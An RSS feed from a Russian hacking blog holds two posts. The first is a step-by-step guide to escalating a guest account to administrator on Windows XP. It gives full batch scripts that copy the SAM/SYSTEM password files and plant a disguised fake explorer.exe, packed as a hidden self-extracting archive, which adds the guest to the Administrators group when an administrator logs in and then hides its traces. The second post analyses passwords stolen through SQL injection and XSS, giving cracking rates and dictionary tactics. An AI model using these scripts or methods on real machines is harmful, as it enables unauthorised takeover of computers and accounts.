<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>IPB &#124; WordPress &#124; IP.Board &#124; php-Fusion &#124; Invision Power Board &#187; Всё о Взломе</title>
	<atom:link href="http://pronets.ru/category/vsyo-o-vzlome/feed/" rel="self" type="application/rss+xml" />
	<link>http://pronets.ru</link>
	<description>Моды, Плагины, Форум IPB (IP.Board, Invision Power Board), Cms php-Fusion, Блог WordPress</description>
	<lastBuildDate>Thu, 04 Mar 2010 01:43:06 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Локальный взлом Windows XP</title>
		<link>http://pronets.ru/lokalnyiy-vzlom-windows-xp/</link>
		<comments>http://pronets.ru/lokalnyiy-vzlom-windows-xp/#comments</comments>
		<pubDate>Thu, 11 Sep 2008 20:26:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Всё о Взломе]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[XP]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[Локальный]]></category>

		<guid isPermaLink="false">http://pronets.ru/?p=190</guid>
		<description><![CDATA[Цель 1: получение доступа к файлам Админа (или просто более привелигированного юзера чем вы) с возможностью читать их, копировать, редактировать и удалять&#8230;
Цель 2: получение доступа к резервным файлам SAM SYSTEM (что это и для чего: читаем мою предыдущую статью&#8230;)
Цель 3: добавление себя в группу Администраторов (что менее заметно чем появление нового привилегированного юзера ) обеспечивая [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-weight: bold;">Цель 1:</span> получение доступа к файлам Админа (или просто более привелигированного юзера чем вы) с возможностью читать их, копировать, редактировать и удалять&#8230;<br />
<span style="font-weight: bold;">Цель 2:</span> получение доступа к резервным файлам SAM SYSTEM (что это и для чего: читаем мою предыдущую статью&#8230;)<br />
<span style="font-weight: bold;">Цель 3:</span> добавление себя в группу Администраторов (что менее заметно чем появление нового привилегированного юзера ) обеспечивая тем самым полный контроль над компьютером вплоть до смены пароля самого Админа .<br />
Все эти цели нам поможет реализовать наличие командной строки. Как же ее получить?</p>
<p><span id="more-190"></span><br style="font-weight: bold;" /><span style="font-weight: bold;">Достижение цели 1:</span></p>
<p>Допустим вы зашли под Гость&#8221;ем (самый низкий уровень) и ищете Пуск -) Выполнить&#8230; но его там нету!!! Что же делать? Ну вы наверное поумнее и<br />
нажмите <span style="text-decoration: underline;"><a href="http://pronets.ru/tag/windows/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Windows">Windows</a>+R</span> чтоб открылось тоже самое&#8230; но тут увы вам говорят, что мол у вас и на это недостаточно прав. Знаю знаю&#8230; злость берет&#8230;<br />
Тогда делаем так: создаем файл текстовый, потом пишем в нем <span style="text-decoration: underline;">cmd</span> (да, просто <span style="text-decoration: underline;">cmd</span>), после сохраняем и меняем ему расширение с с <span style="text-decoration: underline;">txt</span> на <span style="text-decoration: underline;">bat</span><br />
ВСЕ! Теперь щелкаем на нем дважды и вы получили командную строку. Так просто? Да!<br />
Используя команды как-то &lt;<span style="text-decoration: underline;">dir</span>&gt; для вывода списка каталогов и &lt;<span style="text-decoration: underline;">cd путь к каталогу</span>&gt;,<br />
например &lt;<span style="text-decoration: underline;">cd C:\<a href="http://pronets.ru/tag/windows/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Windows">Windows</a></span>&gt; можно лазить по большинстве<br />
директорий обычно запрещенных вам для просмотра. Используя команду copy можно скопировать нужные файлы, что мы и сделаем для реализации цели 2.<br />
<span style="font-weight: bold;"><br />
<span style="text-decoration: underline;">Итак цель 1 достигнута!<span> </span></p>
<p></span></span>Теперь вводим в командной строке<br />
&lt;<span style="text-decoration: underline;">copy %windir%\repair\sam &#8220;путь к каталогу куда надо скопировать&#8221;</span>&gt; для копирования sam  и аналогичное для <span style="text-decoration: underline;">system</span><br />
<span style="font-weight: bold;"><br />
<span style="text-decoration: underline;">Все. Цель 2 достигнута!<span style="font-weight: bold;"><span> </span></span></p>
<p></span></span><span style="font-weight: bold;">Достижение цели 3 (наверное самое главное ))) ):</span><br />
<span style="font-weight: bold;"><br />
Итак вы Гость</span>. Добавляем себя в группу Администраторы, для этого в командной строке надо написать &lt;<span style="text-decoration: underline;">net localgroup Администраторы Гость /add</span>&gt;<br />
Но это скорее всего не даст результата (хотя попробуйте&#8230;) Поэтому проделываем возможно легкий а возможно нелегкий путь (это удобно провести у себя на компе а на атакуемый принести уже готовый инструмент):<br />
В этом же каталоге создаем <span style="text-decoration: underline;">bat-файл</span> но другим способом, а именно в командной строке пишем:<br />
<span style="font-weight: bold;">net localgroup Администраторы Гость /add &gt; &#8220;путь к папке в которой создадим наш файл\expme.bat&#8221;</span></p>
<p> </p>
<p> </p>
<p>Достижение цели 2:</p>
<p> </p>
<p> </p>
<p>получили файл с понятно каким именем и с первой командой в нем, далее<br />
жмем на нем правой -) изменить. Дописываем теперь там:</p>
<p><span style="font-weight: bold;">rem Добавляем пользователя Гость в группу Администраторы</span><br />
<br style="font-weight: bold;" /><span style="font-weight: bold;">if &#8220;%errorlevel%&#8221;==&#8221;0&#8243; goto end</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem проверяем успех нашей операции. Если добавить удалось то прыгаем на метку end</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">rem мы здесь? а не на метке end? значит зашел не Админ, тогда&#8230;</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">copy /Y %windir%\explorerme.exe %windir%\system32\Wbem\explorer.exe</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem копируем explorerme.exe из папки <a href="http://pronets.ru/tag/windows/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Windows">windows</a> в папку <a href="http://pronets.ru/tag/windows/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Windows">windows</a>\system32\Wbem</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">start %windir%\system32\Wbem\explorer.exe</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem запускаем explorer.exe из папки <a href="http://pronets.ru/tag/windows/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Windows">windows</a>\system32\Wbem будто все<br />
rem нормально и нечего непроизошло</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">exit</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem выходим из командной оболочки чтобы она невисела после завершения операций<br />
rem тем самым демаскируя себя</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">:end</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem метка end Раз мы здесь значит зашел все-таки Админ и мы уже<br />
rem в группе Администраторов тоже</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">taskkill /f /im explorer.exe</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem пытаемся вырубить наш самописанный explorer.exe )) на всякий случай</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">del /Q %windir%\explorer.exe</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem удаляем самописанный explorer.exe</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">ren %windir%\explorerme.exe explorer.exe</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem переименовываем оригинальный файл с explorerme.exe в explorer.exe</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">start explorer.exe</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem запускаем оригинальный explorer.exe как ничего будто и небыло )))</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">exit</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem выходим из командной оболочки чтобы она невисела после завершения<br />
rem операций тем самым демаскируя себя</span></p>
<p>сохраняем <span style="text-decoration: underline;">expme.bat</span><br style="text-decoration: underline;" /><br />
  <span style="font-style: italic;"> Теперь выделяем его и жмем на нем правой Добавить в архив WinRAR -) ставим Птичку на Создать SFX-архив -) идем в закладку дополнительно -) Параметы SFX -)<br />
Путь для расспаковки: %windir% -) </span><br style="font-style: italic;" /><span style="font-style: italic;">Выполнить после расспаковки: cmd.exe /C start /min %windir%\expme.bat -) режим вывода информации: скрыть все -) режим перезаписи (это на всякий случай):</span><span style="font-style: italic;"> перезаписывать без запроса.  -) загрузить значок sfx из файла выбираем иконку похожую на иконку эксплорера, а то в меню пуск у моего компьютера будет неподобающий значок что может сильно насторожить )))</span>Все. Жмем Ок в этом окне и в следующем. Получили самораспаковывающийся архив WinRAR. Переименовываем его в <span style="text-decoration: underline;">explorer.exe</span> .<br />
Теперь создаем второй bat-файл. В нем должно быть такое содержание:<br />
<br style="font-weight: bold;" /><span style="font-weight: bold;">@echo off</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem отключаем эхо-вывод чтоб он нам немешал, хотя можно эту строчку и убрать</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">title -=() attack bat-file by bre@k [hackzone.ru] ()=-</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem пишем копирайты ))) мои&#8230;</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">ren %windir%\explorer.exe explorerme.exe</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem переименовываем explorer.exe из папки <a href="http://pronets.ru/tag/windows/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Windows">windows</a> в explorerme.exe</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">if &#8220;%errorlevel%&#8221;==&#8221;0&#8243; (echo Operation 1 completed successfully) else goto end</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem если переименовать невышло идем на метку end иначе пишем что орперация 1 завершилась успешно</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">copy /Y explorer.exe %windir%</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem </span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">if &#8220;%errorlevel%&#8221;==&#8221;0&#8243; (echo Operation 2 completed successfully) else goto end</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem если скопировать невышло идем на метку end иначе пишем что орперация 2 завершилась успешно</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">echo.</span><br style="font-weight: bold;" /><span style="font-weight: bold;">echo Press any key to logoff&#8230;</span><br style="font-weight: bold;" /><span style="font-weight: bold;">echo.</span><br style="font-weight: bold;" /><span style="font-weight: bold;">pause</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem пишем, что мол нажмите клавишу если хотите сейчас выйти из системы</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">logoff</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem выходим из системы если нажали клавишу а не просто закрыли окно</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">exit</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem завершаем командную облочку (на всякий случай) хотя можно это убрать</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">:end</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem метка end если мы здесь значит что-то пошло не так как хотелось&#8230;</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">echo.</span><br style="font-weight: bold;" /><span style="font-weight: bold;">color 04</span><br style="font-weight: bold;" /><span style="font-weight: bold;">echo Something wrong&#8230; check if file system is not NTFS! and try again</span><br style="font-weight: bold;" /><span style="font-weight: bold;">echo.</span><br style="font-weight: bold;" /><span style="font-weight: bold;">pause</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem пишем что что-то не то&#8230; проверьте что файловая система действительно не NTFS и попробуйте опять</span><br style="font-weight: bold;" /><br style="font-weight: bold;" /><span style="font-weight: bold;">exit</span><br style="font-weight: bold;" /><span style="font-weight: bold;">rem завершаем командную облочку</span><br style="font-weight: bold;" /><br />
<span style="font-style: italic;">Сохраняем его под именем attack.bat Теперь выделяем attack.bat и наш созданный </span><span style="font-style: italic; text-decoration: underline;">explorer.exe</span><span style="font-style: italic;"> -) Добавить в архив WinRAR -) ставим Птичку на Создать SFX-архив -) идем в закладку дополнительно -) Параметы SFX -)<br />
Путь для расспаковки: %temp% -) </span><br style="font-style: italic;" /><span style="font-style: italic;">Выполнить после расспаковки: %temp%\attack.bat -) режим вывода информации: скрыть все -) режим перезаписи (это на всякий случай):</span><span style="font-style: italic;"> перезаписывать без запроса.</span>Все. Даем ему имя atack.exe и берем с собой на копм, что будем атаковать. Если все сделано правильно, то нам останется только запустить его, а потом дождатся пока Админ зайдет под своим аккаунтом и мы тоже Админы (хоть и Гость&#8221;и), хехе )))<br />
Если зайдет простой юзер то скрипт просто отработает нужные действия, а если зайдет Администратор (или юзер золотой ;-)) ), то он добавит Гостя в группу Админов и восстановит все как было (ну или почти как было))) ).</p>
<p> </p>
<p> </p>
<p><span style="font-weight: bold;">Итак цель 3 тоже достигнута!<br />
</span><br />
Ну и рекомендую прочитать учебник по командной строке: так и напишите в любой поисковой системе и вы найдете. Командная строка это просто, можно ведь было реализовать вышеприведенное на С++ но зачем еще этим парить мозги когда можно все сделать быстрее и проще&#8230; Именно к этому я стремился незнаю вышло ли&#8230;<br />
<br style="font-weight: bold;" /><strong>Хочется заметить, что все это не будет увы работать на разделах NTFS, поэтому в первую очередь проверяйте тип файловой системы!<br />
</strong><br />
<span style="font-weight: bold; text-decoration: underline;">Обьяснения:</span> статья писалась исключительно в образовательных целях и для указания бреши в системе защиты, и за все возможные последствия после прочтения этой статьи в том числе и после использования прикрепленных файлов (они выкладываются для ознакомления) я ответственности не несу.</p>

	<b>Метки:</b> <a href="http://pronets.ru/tag/vzlom/" title="взлом" rel="tag nofollow">взлом</a>, <a href="http://pronets.ru/tag/lokalnyiy/" title="Локальный" rel="tag nofollow">Локальный</a>, <a href="http://pronets.ru/tag/xp/" title="XP" rel="tag nofollow">XP</a>, <a href="http://pronets.ru/tag/windows/" title="Windows" rel="tag nofollow">Windows</a><br /><br />

	<ul class="st-related-posts">
	<li><a href="http://pronets.ru/windows-7-zamaskiruetsya-pod-xp/" title="Windows 7 замаскируется под XP (27/04/2009)">Windows 7 замаскируется под XP</a> (0)</li>
	<li><a href="http://pronets.ru/bezopasnost-windows-vista-vzlom-adekvaten-zaschite/" title="Безопасность Windows Vista &#8211; взлом адекватен защите (16/01/2009)">Безопасность Windows Vista &#8211; взлом адекватен защите</a> (0)</li>
	<li><a href="http://pronets.ru/chego-stoit-zhdat-ot-windows-7/" title="Чего стоит ждать от Windows 7? (20/04/2009)">Чего стоит ждать от Windows 7?</a> (0)</li>
	<li><a href="http://pronets.ru/peredelka-interfeysa-windows-vista-i-xp/" title="Переделка интерфейса Windows Vista и XP (16/01/2009)">Переделка интерфейса Windows Vista и XP</a> (0)</li>
	<li><a href="http://pronets.ru/obzor-antivirusov-dlya-windows/" title="Обзор антивирусов для Windows (13/02/2009)">Обзор антивирусов для Windows</a> (0)</li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://pronets.ru/lokalnyiy-vzlom-windows-xp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Часто выбираемые пароли</title>
		<link>http://pronets.ru/chasto-vyibiraemyie-paroli/</link>
		<comments>http://pronets.ru/chasto-vyibiraemyie-paroli/#comments</comments>
		<pubDate>Thu, 11 Sep 2008 20:21:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Всё о Взломе]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[Выбираемые]]></category>
		<category><![CDATA[Пароли]]></category>
		<category><![CDATA[Пароль]]></category>

		<guid isPermaLink="false">http://pronets.ru/?p=189</guid>
		<description><![CDATA[В данной статье описываются результаты анализа паролей, которые используют пользователи для доступа к форумам, сайтам, электронной почте. Эти пароли не генерировались системой или назначались администратором, а их задавал сам пользователь при регистрации.

По моей просьбе, люди, знакомые по интернету, собрали базу данных для этого исследования. Во время стадии сбора информации в основном использовались уязвимости типа SQL-injection [...]]]></description>
			<content:encoded><![CDATA[<p>В данной статье описываются результаты анализа паролей, которые используют пользователи для доступа к форумам, сайтам, электронной почте. Эти пароли не генерировались системой или назначались администратором, а их задавал сам пользователь при регистрации.</p>
<p><span id="more-189"></span><br />
По моей просьбе, люди, знакомые по интернету, собрали базу данных для этого исследования. Во время стадии сбора информации в основном использовались уязвимости типа <a href="http://pronets.ru/tag/sql/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with SQL">SQL</a>-injection (позволяющие пользователю выполнять любые запросы к базе данных, установленной на сервере), XSS (cross-site-scripting, позволяет взломщику внедрить в страницу свой html-код, что дает возможность украсть cookies администратора и затем подделать сессию), а также простые оплошности системных администраторов, когда из-за неправильной конфигурации сервера базу данных мог просматривать любой человек.</p>
<p>В результате этой работы была собрана база данных вида &#8220;логин:пароль&#8221;, содержащая 52125 записей. Большую часть (42920, 82,3%) из них представляли md5-хэши, остальные (9205, 17,7%) &#8211; пароли в виде plain-text (незашифрованные) или пароли, зашифрованные алгоритмами, допускающими построение обратной функции &#8211; то есть расшифровку (например base64). Использование в интернет-проекте публичных алгоритмов, позволяющих декриптовать пароль, не дает никакой защиты и, по сути, ничем не лучше хранения паролей в открытом виде.</p>
<p>В собранный базе данных есть пароли, заданные пользователями разных наций, но подавляющее большинство приходится на русских (около 40%) и американцев (почти 20%), остальные &#8211; в основном европейцы (немцы, поляки, чехи, англичане). Азиатов &#8211; единицы.<br />
Атака на MD5</p>
<p>После сбора информации для проведения анализа необходимо было взломать хотя бы некоторую часть полученных md5-хэшей. Для тех, кто не сведущ в криптографии или программировании, попытаюсь объяснить суть этого алгоритма. Приведем общее определение хэш-функции &#8211; это преобразование, которое позволяет из данных произвольной длины получить некое значение фиксированной длины. Известный пример такой функции &#8211; crc32, контрольная сумма файла. Хэш-функции также бывают криптографическими и программистскими. Нас интересует первый вариант. Основными свойствами хэш-функций, применяемых в криптографии, являются необратимость и свободность от коллизий. Необратимость означает, что нельзя разработать алгоритм, который на основе известного хэша позволяет получить исходные данные (грубо говоря, зная хэш пароля, получить сам пароль). Свободность от коллизий &#8211; практическую невозможность подобрать два разных исходных аргумента, значение хэш-функции для которых будет одинаковым. MD5 &#8211; публичный алгоритм, являющийся криптографической хэш-функцией, поэтому единственный возможный тип атаки на него &#8211; зашифровка всех возможных значений пароля и сравнение полученного результата с известным хэшем. .</p>
<p>Для взлома md5-хэшей я использовал программу Passwords Pro v1.2.0.1 . С ее помощью удалось взломать 21249 паролей из 42920 (49,5%). Уже исходя из этих данных можно утверждать, что почти половина всех используемых сейчас паролей &#8211; ненадежные. Были подобраны все пароли, длина которых менее 5 символов и все численные пароли, длина которых менее 10 символов. Заявленная разработчкиком скорость для разных процессоров:</p>
<p>Intel Pentium-III 1000 MHz ~2,2 миллиона паролей/секунду</p>
<p>AMD AthlonXP 1700+ (1466 MHz) ~3,6 миллиона паролей/секунду</p>
<p>Intel Pentium-4 2400 MHz ~4,0 миллиона паролей/секунду</p>
<p>Реальная скорость перебора для моего компьютера (AMD AthlonXP 1600+) составляла около 3,2 миллионов паролей в секунду для взлома одного пароля и падала приблизительно до 200 тысяч паролей в секунду при одновременном взломе 8000 паролей (это происходит из-за того, что программе необходимо сравнить значение хэш-функции, полученное для проверяемого пароля, со всеми известными хэшами, загруженными в нее). Максимальное время, требующееся для подбора пароля, рассчитывается по следующей формуле:</p>
<p>где N &#8211; количество символов в наборе, из которого составляется пароль, L &#8211; предельная длина пароля, S &#8211; число проверок в секунду. Например, если рассчитать по этой формуле время, которое потребуется для перебора всех численных паролей длиной до 9 символов (S=3*106, N=10 (цифры), i=8), то получим всего лишь 37 секунд.</p>
<p>Однако метод полного перебора всех возможных комбинаций хорош либо для малого числа символов в наборе, либо для паролей небольшой длины (4-5 символов). Так для перебора на обычном компьютере всех возможных паролей (могут включать 224 печатных символа) максимальной длинной 6 символов уже требуются 490 суток.</p>
<p>Кроме атаки полным перебором использовалась атака по словарю, когда возможные пароли не генерируются программой, а берутся из файла-словаря, заранее составленного пользователем.<br />
Анализ</p>
<p>Из полученной базы были удалены записи, с одинаковыми логинами и паролями. Вероятность того, что эти учетные записи были созданы одним и тем же человеком, довольна мала, но я решил все-таки учесть и ее. В результате всего было проанализировано 30,450 паролей разных пользователей. Для сбора статистики была написана специальная программа, так как обработать вручную такой массив данных не представляется реальным.</p>
<p>Популярные пароли. 15 самых популярных паролей и количество пользователей, избравших их, приведено ниже:<br />
123456 &#8211; 449 пользователей<br />
123 &#8211; 303 пользователя<br />
12345 &#8211; 288 пользователя<br />
qwerty &#8211; 206 пользователей<br />
12345678 &#8211; 148 пользователей<br />
111 &#8211; 113 пользователей<br />
1234 &#8211; 103 пользователя<br />
666 &#8211; 85 пользователей<br />
123321 &#8211; 77 пользователей<br />
1111 &#8211; 77 пользователей<br />
111111 &#8211; 76 пользователей<br />
gfhjkm &#8211; 76 пользователей<br />
<a href="http://pronets.ru/tag/password/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Password">password</a> &#8211; 71 пользователь<br />
1234567 &#8211; 69 пользователей<br />
777 &#8211; 65 пользователей</p>
<p>. Исходя из этих данных, можно сказать, что в целом за последние время наблюдается упрощение паролей, используемых пользователями. Так, по данным, собранным Solar Designer, в начале 90-х самыми популярными паролями являлись:<br />
12345<br />
abc123<br />
<a href="http://pronets.ru/tag/password/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Password">password</a><br />
passwd<br />
123456<br />
newpass<br />
notused<br />
Hockey<br />
Internet</p>
<p>Конечно, приведенные пароли также не надежны, но среди них нет ни одного длиной менее 4 символов или состоящего из одинаковых цифр (111).</p>
<p>Логин в пароле. Целых 729 (2%) паролей оказались абсолютно идентичными имени пользователя, не изменялся даже регистр букв (m2t4:m2t4, salavat:salavat). Еще 314 представляли собой различные модификации логина &#8211; добавление одной/нескольких цифр в начале или конце (jotum:1jotum, skiz:skiz57); запись всего логина или его части в обратном порядке (chap118:811pahc, zoran58:naroz85); добавление фамилии к имени (korey:koreyblake); запись в другом регистре (dorofey:DOROFEY). При желании взломщик может собрать дополнительную информацию о пользователе (благо сделать это не так уж и сложно), и перебрать возможные варианты. Если учесть что в большинстве случаев добавляют сочетания вроде 1, 123 или год рождения, а процесс генерации подобных комбинаций можно автоматизировать, то такие пароли являются небезопасными и могут быть подобраны довольно быстро.</p>
<p>Атака по словарю. Большинство пользователей выбирают пароль, который несет какую-то смысловую нагрузку, что позволяет взломщику использовать атаку по словарю &#8211; перебор паролей из заранее составленного списка. Как основу для составления такого списка зачастую используют толковые словари языка, также распространена практика составления словарей по художественной литературе. Во втором случае, из книги в электронном формате с помощью специальной программы выбираются все использованные в ней слова, за исключением форм слова в разном числе или падеже. Второй подход считается более продуктивным, так как он позволяет собрать активно используемый лексикон языка, а списки на основе различных словарей получаются большими, но большая часть времени уйдет на проверку вариантов, которые фактически не используются в качестве паролей (специальные термины и т.п.). Также составляют списки наиболее употребляемых паролей, в которые могут входить и числа.</p>
<p>Модификация слова (запись в обратном порядке, удвоение, добавление цифр и т.п.) не спасает, так как с помощью написанной за 10 минут программы или готового софта на основе базового словаря можно быстро сгенерировать все эти варианты и проверить. Существуют даже программы, которые заменяют буквы схожими по начертанию цифры (coolpass станет c00lpa55). Так что такие, казалось бы надежные, уловки не приводят к повышению устойчивости используемого пароля. Не думайте, что вы окажетесь умнее взломщика. Если хотите сделать свой пароль неуязвимым к словарной атаке &#8211; выбирайте бессмысленные комбинации символов.</p>
<p>В моем случае по словарям удалось подобрать 14176 (46,5%) паролей. Как видно, почти половина пользователей выбирает осмысленный пароль. Из этих паролей 6938 (22,8% от всех паролей) были подобраны всего лишь по двум маленьким словарям, в которые входят самые популярные пароли. Приведу краткую статистику по словарям, которые оказались наиболее эффективными (через запятую указано количество слов в словаре, затем число подобранных паролей):<br />
популярные пароли, 2153 &#8211; 5068<br />
более полный словарь популярных паролей, 13958 &#8211; 6924<br />
названия рок-групп и имена музыкантов, 12340 &#8211; 890<br />
имена разных народов, 39132 &#8211; 1357<br />
русские слова, набранные в английской раскладке, 138204 &#8211; 1406<br />
русские слова, набранные транслитом, 138204 &#8211; 1958<br />
слова разных народов, 3,162,009- 10685<br />
слова разных народов, записанные в обратном порядке, 3,162,009 &#8211; 9223</p>
<p>Стоит упомянуть, что по словарю, который использовался червем Морриса (419 слов), было подобрано всего 389 паролей. А в 1988 году этот вирус смог поразить 6200 компьютеров, это еще раз показывает, что наиболее употребляемые пароли изменяются с течением времени.</p>
<p>Статистика по длине и составу паролей. В результате анализа пароля по их длине и составу была создана таблица, в которой можно наглядно увидеть наиболее популярные типы паролей. Во второй колонке указывается количество символов в наборе, из которого составлен пароль, что удобно для некоторых расчетов. Так, чтобы вычислить количество паролей определенного типа, необходимо рассчитать число размещений с повторениями, что делается по следующей формуле:<br />
P=nr</p>
<p>где P &#8211; количество размещений (паролей), n &#8211; количество элементов множества, из которого осуществляется выборка (символов в наборе), r &#8211; число элементов (максимальная длина пароля).<br />
длина пароля<br />
состав пароля символов<br />
в наборе&lt;=3 4 5 6 7 8 &gt;8 сумма %<br />
мал. 26 616 1371 2063 4180 2664 2663 768 14325 47,09<br />
цифры 10 1003 1747 1309 4712 1441 2289 119 12620 41,48<br />
мал.+цифры 36 24 134 314 572 392 623 305 2364 7,77<br />
малые+бол. 52 18 59 80 117 67 88 37 466 1,53<br />
бол. 26 34 58 37 42 21 17 1 210 0,69<br />
мал.+бол.+цифры 62 2 2 4 21 21 43 27 120 0,39<br />
мал+спец 58 1 18 21 13 27 18 11 109 0,36<br />
кириллица 66 5 8 30 12 12 8 7 82 0,27<br />
бол.+цифры 36 1 10 14 15 6 11 10 67 0,22<br />
спец.символы 32 13 4 0 2 1 0 0 20 0,07<br />
мал+бол+спец 84 0 0 6 3 2 3 1 15 0,05<br />
мал+спец+цифры 68 0 3 0 0 1 2 4 10 0,03<br />
цифры+спец 42 5 1 0 0 0 2 0 8 0,03<br />
мал+бол+сп+циф 94 0 0 0 0 1 0 3 4 0,01<br />
бол+спец 58 0 1 0 0 0 0 1 2 0,01<br />
сумма 1722 3416 3878 9689 4656 5767 1294 30422<br />
% 5,66 11,23 12,75 31,85 15,30 18,96 4,25</p>
<p>Некоторые пояснения &#8211; через &#8220;мал.&#8221; и &#8220;бол.&#8221; обозначены строчные и прописные латинские буквы соответственно. &#8220;Спец.&#8221; &#8211; спецсимволы (например !@#). В строку кириллица вошли пароли, содержащие в себе символы русского или других национальных алфавитов, но не обязательно полностью состоящие из них (то есть пароль &#8220;паroL12&#8243; также подпадает под эту графу). В сводную таблицу не вошли 28 паролей, содержащих символы, единственный способ ввода которых &#8211; использование дополнительной клавиатуры, для введения символа через его код, например ®.</p>
<p>Из приведенной таблицы несложно сделать выводы &#8211; самая популярная длинна пароля &#8211; 6 символов, состав &#8211; малые латинские символы или цифры. Более того, длина 85,6 процентов всех паролей менее 8 символов, а состоят они из малых букв или цифр (в таблице выделены оранжевым). Подсчитаем время, которое необходимо для взлома md5-хэшей таких паролей на локальном компьютере. За среднюю скорость возьмем 3 миллиона вариантов в секунду, тогда по уже известной формуле получим:<br />
Для малых букв: 20,109 (часов)<br />
Для цифр: 0,01 (часов)</p>
<p>То есть, грубо говоря, вероятность того, что вы менее чем за сутки взломаете среднестатистический пароль, зная его md5-хэш, &#8211; 85%!</p>
<p>Еще несколько фактов. Среди собранных паролей оказались 53 пароля системных администратора (логины admin, administrator, webmaster). На общем фоне их пароли кажутся более надежными, но большая часть уязвима для атаки по словарю.</p>
<p>Основные правила, применяемые пользователями, для генерации пароля путем изменения словарного слова или логина:<br />
добавление цифры в начале и/или конце пароля (в большинстве случаев &#8211; 0,1,…,9; 1,12,123,…; 00,11,…,99; 10,20,…,90; зачастую &#8211; год рождения)<br />
зеркалирование (matrix=xirtam)<br />
умножение слова, возможны разделители (moneymoney; zero-zero)<br />
умножение с зеркалированием (pepperreppep)<br />
запись в другой раскладке (валера =dfkthf)<br />
эксперименты с регистром букв (eXcesS)<br />
замена букв на цифры, схожие но начертанию (1slam)<br />
запись прямым/обратным транслитом (морж = morzh; billgates = биллгейтс)</p>
<p>Возможно применение нескольких правил одновременно, но даже это не дает надежной защиты от атаки по словарю, так как взломщик может модифицировать исходный пароль тем же самым путем.</p>
